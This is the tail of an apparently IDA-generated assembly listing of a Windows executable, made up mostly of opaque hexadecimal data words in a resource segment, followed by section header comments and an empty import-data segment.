		dd 0FCCDDCB7h, 0AB4E7543h, 3AD3460h, 17E4CCFBh,	0B59F4CBh
		dd 78C55B73h, 5DD23DC5h, 36936333h, 2DE4F796h, 5B0C5012h
		dd 0F4FAAF98h, 43292D5Dh, 0F55ABF0Dh, 7AA8A473h, 0C74DF28Fh
		dd 6F65845Ch, 88EB06B4h, 34E5A5FDh, 0AF76A95Ah,	329C0F8Ch
		dd 0B2548180h, 52CAE7EAh, 0E2AB3838h, 8C621FB0h, 0DC03506Eh
		dd 231FB73Fh, 4ED9B8B6h, 587A1D1Dh, 0D50487CEh,	48DD0A09h
		dd 0DD3921E9h, 7365C290h, 440AEDBFh, 718BE880h,	19484394h
		dd 0C7D35547h, 0D8FEF995h, 92C498A6h, 4B56D6BAh, 786E166Dh
		dd 5D42219Eh, 0FE6CCFBAh, 93154240h, 7341F49Ch,	30F93698h
		dd 0F697C4D8h, 98F367A5h, 0D10F8D4Bh, 0FF712826h, 77A315Dh
		dd 0D2FBCFFEh, 83ADCAB1h, 0AEA3F2ADh, 89C7AD03h, 3512CB83h
		dd 0A4B3A998h, 5D47F88Dh, 0B890858Bh, 0B7462C1Bh, 136EA772h
		dd 8127B4AAh, 83D993FEh, 624DEA92h, 0B9B3528Eh,	2DFECCBBh
		dd 0E4316E6Ch, 206A070Ch, 17F5B583h, 92614B1Dh,	8EDB8986h
		dd 0EF8A3806h, 0BB563432h, 3A320572h, 0BD0EBB89h, 5EA22B70h
		dd 0EA90D111h, 0A1DB1406h, 9C6F0B09h, 5C03F2F6h, 2401A9CCh
		dd 5ABDDF87h, 0B3D77473h, 99E7756Fh, 0B3472334h, 577CC0D4h
		dd 200FB5B7h, 14FAB185h, 0C9AE6C69h, 8C992F1Bh,	8A6B1320h
		dd 5B20C1F6h, 35189E97h, 0C1FF9D85h, 0D8A24740h, 0B7A30C3Dh
		dd 67721D0Bh, 5D38C2D1h, 281C948Dh, 0EAC18A98h,	0DDA37945h
		dd 8081363Dh, 6645F52Ch, 503DCDCFh, 615A587h, 0D7C36F6Ah
		dd 0DEA65A6Fh, 9B972936h, 7D6BE3E1h, 5A3CDEC0h,	0AE9A9BDh
		dd 0DCF07A66h, 0BBAC465Ah, 0B3422E0Dh, 5662CCDDh, 5C32F5EAh
		dd 4F58C90h, 0C1EE7B68h, 0AEBA5550h, 0AE561413h, 7C44E1E5h
		dd 2037CAD2h, 1EE59A9Ah, 0E4FD497Ah, 0B58B2D4Fh, 0A7101F0Fh
		dd 7A5BEBF7h, 38088CB6h, 7790EF9Ah, 0CF7C4B1Ah,	0BF9A2D8Bh
		dd 947F0B1Fh, 4E36F1B2h
		dd 2101A4BAh, 13F1DB95h, 0E6C44E46h, 0F3BB0E02h, 9C750B14h
		dd 5A24C1D5h, 122085C4h, 0C9FBDBA8h, 8E846E69h,	0AB9F2577h
		dd 0F110A08h, 314D42FDh, 0DC25D5D4h, 0B884E7EDh, 0DC55EB2Bh
		dd 0DEFC6943h, 2605107Eh, 0DE92B09Dh, 82FAFC6h,	6C1F8C1Bh
		dd 0E1D6031Bh, 912C63F7h, 2EAFEDADh, 1F2CAB4Ch,	44755C52h
		dd 0E53B0D3Bh, 0D8796E34h, 0E48DE8C4h, 9934A1A6h, 7274883Ch
		dd 28031DE5h, 67F89FEBh, 26E38EC7h, 0FBBE6A8h, 743AA7BFh
		dd 4865C3BBh, 4D0512BDh, 76BC293Bh, 0CAE845CBh,	0E3BDF4E0h
		dd 48109DA9h, 0B165A2C5h, 4ABABA64h, 81BE9C1Dh,	0A19B4F40h
		dd 0FC1A7F9Bh, 6B00F09Fh, 183D8AE5h, 9D0906F7h,	0A0C8150Fh
		dd 0BCE0258Eh, 6AC82D7Bh, 0D1B4575Ch, 6A5D0A44h, 0F2617BFDh
		dd 591DD52Bh, 0DCF9565Fh, 5766C42Ch, 707EFEE4h,	9F7B949Bh
		dd 0BB8B1996h, 4F92D82Eh, 5472A3A6h, 0D1BA47Bh,	3957B7D8h
		dd 0F07E88DCh, 909D2629h, 0BBD93BDBh, 0B5413E5Eh, 4174D8C3h
		dd 6B19E5E5h, 94D1E4A1h, 0A698F99Bh, 0C1D8D439h, 0A5576864h
		dd 4A63C7DFh, 0D09DE9BCh, 71BDC101h, 0CDE8DF27h, 0ADB44155h
		dd 0F311066Bh, 0E06BDA96h, 7B433457h, 886B73EEh, 2FEF3F6Eh
		dd 0FDC7B7D0h, 629AF970h, 4F4390BBh, 4B0699C8h,	2C99F6F4h
		dd 0DD50DD70h, 2CF17E67h, 0CF36B7E3h, 2B424EA2h, 421D1CEh
		dd 0B1ACAEBFh, 0E2876C08h, 9862AB51h, 0ED23B050h, 314EABA2h
		dd 2F09A5A3h, 0EED16C69h, 4C812E6Ah, 0EED683C3h, 0EFAC0F81h
		dd 39548186h, 30F251E8h, 4AB381Ch, 88FBC3B5h, 71FC315Bh
		dd 101FA0C6h, 3C5EDF20h, 0DD08E2DFh, 93811754h,	6360B76Fh
		dd 209564Dh, 0E9CA6071h, 0E6E57ADFh, 6E8BD8C5h,	3F129741h
		dd 0C4E3701Ch, 0D06BF9EAh, 486B98A3h, 480CC2D5h, 749386B9h
		dd 0A429A17h, 0CAD96AA3h, 834FB2E8h, 0B5CC13BBh, 1C6CF9E5h
		dd 0CF1AF29Bh, 0A5F300B9h, 80BF1A1Ch, 69E42A22h, 2877887Ah
		dd 89E73093h, 469DCADBh, 9BE7D8A6h, 0B81D524Eh,	0FDDE818Bh
		dd 1E5ED428h, 16F213D1h, 0D0A2CFE8h, 59FD747Dh,	2305A50Dh
		dd 1D6A06B8h, 6007AE9Bh, 2A94ED88h, 4C57FAF1h, 86C17DABh
		dd 0BD780B59h, 0FC1761B1h, 0BF904B4Eh, 66B2CA91h, 0C5D86E5Fh
		dd 3957FE07h, 0E8365310h, 4563DEDAh, 110CEBE7h,	40BD701Ch
		dd 24B113Fh, 0C2D01117h, 9B1381A4h, 1A347DE5h, 0E30C0BDh
		dd 22CFBCA5h, 0D1FE395Ch, 5D19430Ch, 0F422432Ah, 203E977Fh
		dd 1F2195C3h, 19C2858Ah, 0E2A56877h, 5B131946h,	0FA285EA8h
		dd 0D9F12C0Eh, 3A6FFCE5h, 7E9AF73Dh, 56C64977h,	0E4DE56D9h
		dd 0D28BF677h, 0A14996BCh, 68591672h, 0D3CDAAFBh, 842EBDD8h
		dd 1E745462h, 0E9B60D71h, 624E9BB6h, 878BC82h, 89A76A53h
		dd 672EAE2Ch, 200747BFh, 3994057Dh, 375481BBh, 0EB17D7AEh
		dd 71AB0815h, 89FB5DA4h, 0E50F885Ch, 42788C88h,	0E11F4FBh
		dd 25C1CCD2h, 14E0E40h,	0BFED1676h, 0EB0E0EF1h,	0A2B8928Eh
		dd 4350A50Ch, 0C23665BFh, 72B7243Eh, 3A1CB1B1h,	0F10F6080h
		dd 5372CF94h, 1D238D89h, 39DDAAC2h, 0E128E518h,	4EE9766Fh
		dd 0C2917DAEh, 0B0419E98h, 4F6CCCAEh, 8F2279F2h, 0FFC31006h
		dd 0FD26F1C4h, 0A8F37844h, 0AAB85B51h, 655E0271h, 592FAF8h
		dd 0ACC92434h, 0D665BECEh, 6B757E7Ah, 2F4CA8A7h, 77DA412Dh
		dd 4323FFCEh, 0B2CE2ABAh, 0B72EDC05h, 9CD9D180h, 35618261h
		dd 1425195Dh, 9F206D09h, 222B312Fh, 0E3307133h,	0B2AF6B6Dh
		dd 3B679414h, 0EAABAADEh, 0A28EA18Fh, 28256735h, 0E9364FD9h
		dd 913D4F09h, 415DBB31h, 0E684A56Fh, 1784EE10h,	0F3C09BBEh
		dd 1189AF66h, 1A38A5BCh, 4609C0D4h, 0E671E980h,	9E8A3BD3h
		dd 0C619BBC2h, 0F5130FE8h, 0B4B30898h, 4D59E666h, 2AC6E19Ah
		dd 887588E3h, 0F694977h, 0FA58F07Dh, 9AC9A19Eh,	535FEC0Eh
		dd 0E72FF47h, 0C239DCD4h, 0D5F24FD9h, 88F85026h, 0D21D8290h
		dd 6958E045h, 572271FCh, 1CB1808h, 2DA5BC52h, 92AE7F81h
		dd 337E8B15h, 4B11D6BCh, 0D8A50202h, 7444D17Eh,	6DFD6A74h
		dd 813DA2C7h, 864FE3Ah,	0D2708CDBh, 0ABEF830Dh,	0B237F526h
		dd 0F4022A5Fh, 583D8EC3h, 1A1EBCB6h, 656462E9h,	0C4B9EECCh
		dd 0D0F97E33h, 6159549Ch, 28196D32h, 447C55BBh,	5EAEE8E7h
		dd 0B5976C25h, 0FCC36E1Eh, 0DC2A494Ch, 661EE0ADh, 4015E6E1h
		dd 38D8A1A7h, 5EEA1A39h, 0FCC2A3D1h, 54D1F36Fh,	4E419E9Bh
		dd 33B99C7h, 5056610Ch,	2A48202Fh, 0D2DF5978h, 0E5F8781Fh
		dd 7B4A6DCAh, 5672CA25h, 0E6B8DCF9h, 529E262Fh,	0E8DEB7C5h
		dd 8E5FD7Bh, 584742F7h,	5C77D4DBh, 0A87A4272h, 0E0992B1Bh
		dd 0F23BC2A9h, 0CAA383B1h, 83DCFAD3h, 624CF526h, 989AA086h
		dd 35D43100h, 0D42EA3D6h, 7AE2A287h, 6F01E5B3h,	443F4A20h
		dd 6B2D0B3Bh, 2FF54936h, 5F8B9DEAh, 1602A372h, 0ECAFB709h
		dd 86E8F590h, 664BE74Bh, 27F74F5Dh, 0F17BE46Eh,	0D3B37F78h
		dd 0F5EE0E94h, 74BEC714h, 683DB3E4h, 35B5FAA9h,	0C63EDEF8h
		dd 4D831B99h, 4F69F6D0h, 4AFCDB85h, 5AC01D68h, 0E0C020DDh
		dd 2A5F573h, 284491B1h,	0D1A8DDBFh, 80AAD751h, 0ABC62323h
		dd 0F80CCA88h, 0EB1E7B49h, 0D1B658ADh, 5A70138Ch, 0A8604970h
		dd 4E9D2819h, 0ECDB59C1h, 0F7DB037Fh, 34F52FA4h, 0E5F0D6D7h
		dd 8B953200h, 49872E44h, 0D1D107CCh, 2E90384h, 39541534h
		dd 35BFF7DCh, 0C0A86258h, 0BBBF3559h, 0B1C3605Eh, 38DE1975h
		dd 0C7D9B786h, 5901ED1Dh, 1FB10E0Ah, 0F1ED3DBCh, 0E684EB64h
		dd 9435A2A0h, 7550AE29h, 1BD9B9E8h, 9484414h, 0C7D36C2Ah
		dd 0FCF094E9h, 1F3F9812h, 0B466A9C2h, 47A1E95Bh, 0B328E51Ah
		dd 4EE97669h, 7D1A8D88h, 25419D75h, 61774C41h, 0B4A4F4C4h
		dd 0F892E323h, 82EB261Ah, 0CF1CCD89h, 0BEB8A492h, 5742E43Bh
		dd 7923A7Fh, 0AEC925E3h, 5C7C9B62h, 5114E63h, 591DF8F9h
		dd 5D78D4CBh, 0CD36FF50h, 36CF1C07h, 0A07F5796h, 83278482h
		dd 6628C28h, 29F619D9h,	0EDFABE3Dh, 6AE63230h, 15F69F58h
		dd 95A46B70h, 3C68859Ch, 0D0BFAB54h, 93AF17C7h,	7FD8EA05h
		dd 0BF09596h, 26141504h, 4D9DBB89h, 978FAD52h, 0CA3824F2h
		dd 87563124h, 0B9DD6973h, 1F1157F8h, 175E406Fh,	8DE1859Ch
		dd 1CF20663h, 0B8E64838h, 0CA58FBB2h, 212BDE12h, 0AE7D787h
		dd 0A3620DB9h, 20FADF3Eh, 0D0DD7A53h, 0B8922FB0h, 0A0CCAEBBh
		dd 5470CD73h, 0B15838C4h, 9BE91311h, 0E7DD6060h, 496B3259h
		dd 5E26C9D7h, 341CFCB0h, 8CAD929Bh, 0D7A5150Ah,	0B9953426h
		dd 6B56F25Fh, 40278E96h, 4F40A7A3h, 0C0D24D2Ch,	0C6BE415Ch
		dd 8F977538h, 7F05E8E2h, 506A9DD3h, 45A2ECE1h, 0E4C8607Fh
		dd 9BE9085Bh, 806D0436h, 220DF9E2h, 462FCB96h, 49BB868Eh
		dd 0F2C0606Ch, 0F1E4495Ch, 0C2365946h, 7844F5F9h, 485FDBD1h
		dd 0FA7262E2h, 0AC880E99h, 44AAF13Fh, 5DE26983h, 20BD90E3h
		dd 25158FB6h, 0FC511B9Bh, 0B93390E4h, 7DEA7775h, 0FCFFF04Ch
		dd 0CB37316Eh, 2442F548h, 7CDF7E03h, 771BFE05h,	9CB27094h
		dd 17692032h, 0C3B68EEDh, 5773D2E2h, 839EA392h,	5F227C26h
		dd 0AD09ACACh, 1EAFF45Ch, 0BC4D9A98h, 9253D4E0h, 0BB988C4Eh
		dd 3474DED6h, 0DF82D48Fh, 2D9D300Ch, 0C5AFB09Dh, 0ADF5187Dh
		dd 30270CEEh, 0B8E61DCFh, 0D7DDD4A7h, 7112274Eh, 4665B0C1h
		dd 48A8E3A8h, 0E7EC31A1h, 0CAF205DAh, 9F0859BCh, 9D097265h
		dd 11DA7AB8h, 6E8AD7D5h
		dd 0DCEE562Ch, 0F9D04B3Ch, 0F05C2834h, 0E31FBCE7h, 75653D40h
		dd 74DDB9A3h, 0CF810B63h, 0BEE8150Ah, 0A5554C66h, 0A74F9DC9h
		dd 0B1943684h, 4AC5760Fh, 96291F2Dh, 2F10D4A1h,	0C119FC8Ch
		dd 6B08EAC8h, 0AA564AC4h, 0D7A10608h, 0A4867060h, 290A4DCAh
		dd 41774086h, 0AA449A96h, 0A5892DC0h, 0D2F2AEC0h, 0B7492566h
		dd 0EF06A9AAh, 0F50B6AA4h, 0B05F5254h, 9F84252Eh, 9D4FD630h
		dd 5ED3302Eh, 1E00A200h, 0D2B886Ch, 0D4D7EEB0h,	65B1F7E5h
		dd 90AC38E1h, 89265233h, 0D726D7D5h, 9A558EBAh,	6CE13994h
		dd 6A87D4D2h, 385B1A7Bh, 2820C3C7h, 0ED0B6977h,	540915F6h
		dd 4DE7B0E6h, 0FA8DEAE9h, 42BA2A4Ah, 97DEC359h,	0B94612Fh
		dd 0E83D9A96h, 6B68D381h, 0F29CF0EEh, 0A2BF1CF1h, 0CFB70BB3h
		dd 0F9F6F07Fh, 5BC2A09Ch, 714EEBE8h, 0A91DF9D4h, 40C52220h
		dd 2C0EB3ECh, 0FFD4F879h, 69C2A6A2h, 473E5AC6h,	87EC3DD1h
		dd 0AB20E815h, 937E9C52h, 2EA6096Ch, 0D94E9B98h, 0A2862B82h
		dd 88A5ADE8h, 944CA52Bh, 0DDFD6A66h, 3A19AD1Ch,	0CA3A59ADh
		dd 0E6702326h, 8DAB088Ah, 88F481BBh, 0BA88606Bh, 0F8F18FBBh
		dd 0C3A54AE4h, 22049FADh, 93B16E2Fh, 0E823B1D6h, 671D1C62h
		dd 26259238h, 521ABEB9h, 6E8D1B5Ch, 3C444311h, 0C600418Dh
		dd 0AE50C894h, 8E0A97C1h, 48E44432h, 0FDF7EEEBh, 60428187h
		dd 2F39AEBDh, 7D4F8D92h, 684292D3h, 482D44D5h, 0F3BFB7DAh
		dd 0A5C37F9Ah, 0F0A98B48h, 0DC3B5853h, 0A36FEF16h, 0D1F9DF81h
		dd 80ADCAD0h, 0D8C16C1Ah, 0DEBFDB4Dh, 81313C78h, 0A54CF1C6h
		dd 6A47FB54h, 8EE0FEFDh, 829E6828h, 0FE713386h,	50240C1Bh
		dd 4561328h, 6F7CD9E7h,	74549187h, 9561CED1h, 1D006D69h
		dd 3E00E410h, 25E24BB1h, 9982EFEDh, 0A185C69Ch,	0B757BA34h
		dd 6506536Fh, 24029C1Eh, 2A0FEBB7h, 6B3D1AE3h, 68B4213Fh
		dd 0F2CC58AFh, 0E9B99665h, 0E538A5A1h, 76480D28h, 8D3B66E9h
		dd 62BA273Bh, 0F8D640F5h, 61ED396Bh, 200EB7CAh,	7C6E6340h
		dd 0BB94F1DFh, 0A3C01DF3h, 0CF861446h, 0D0F598F0h, 0D61CA1ADh
		dd 2AEA0DC6h, 0FB9AC7E0h, 6145E0E1h, 15FDBFB3h,	300B03F2h
		dd 3C7465A3h, 2D74FBCFh, 0F81E9AE7h, 0DEA72403h, 32974727h
		dd 0F9DC7FB9h, 69A6AEDCh, 0B6862928h, 765AFDD3h, 992E004Dh
		dd 0CDC90C2Fh, 0B29A33Ah, 92BCD1AEh, 16802325h,	0AAEF833Fh
		dd 4662B901h, 6E035072h, 904984D8h, 4E58B18Eh, 69EDB4C5h
		dd 1FB1F10Ch, 0EDDD50F3h, 429C9932h, 9435A2A2h,	7DE1B57Eh
		dd 33B4D7BAh, 5C341767h, 38EBA839h, 8EE79397h, 7CC4676Bh
		dd 49127B03h, 0C47AEEECh, 0A0BD35A0h, 0CBF9AE43h, 0D7D7726Eh
		dd 2371269Ah, 4C84C9C6h, 0B997F4F2h, 0F24E203Ah, 0FF22406Dh
		dd 811B80F7h, 29AFC4B9h, 0DE72CFCCh, 0DCADDEACh, 41483CAFh
		dd 0D7C579F8h, 0FCCF7992h, 2B8EC859h, 150Dh dup(0)
_rsrc		ends

; Section 4. (virtual address 00016000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00015400
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 1016000h
		dd 80h dup(0)
		align 1000h
_idata2		ends


		end start